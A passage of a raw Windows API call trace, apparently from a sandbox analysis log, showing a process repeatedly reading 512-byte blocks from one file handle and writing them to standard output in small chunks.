_get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.986] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, 
lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.987] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.988] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.988] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0194.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] 
GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.989] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.989] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | 
out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.990] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.991] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 
[0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.992] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) 
returned 1 [0194.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.992] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.006] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.006] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] GetFileType (hFile=0x50) returned 0x1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] GetFileType (hFile=0x50) returned 0x1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] GetFileType (hFile=0x50) returned 0x1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, 
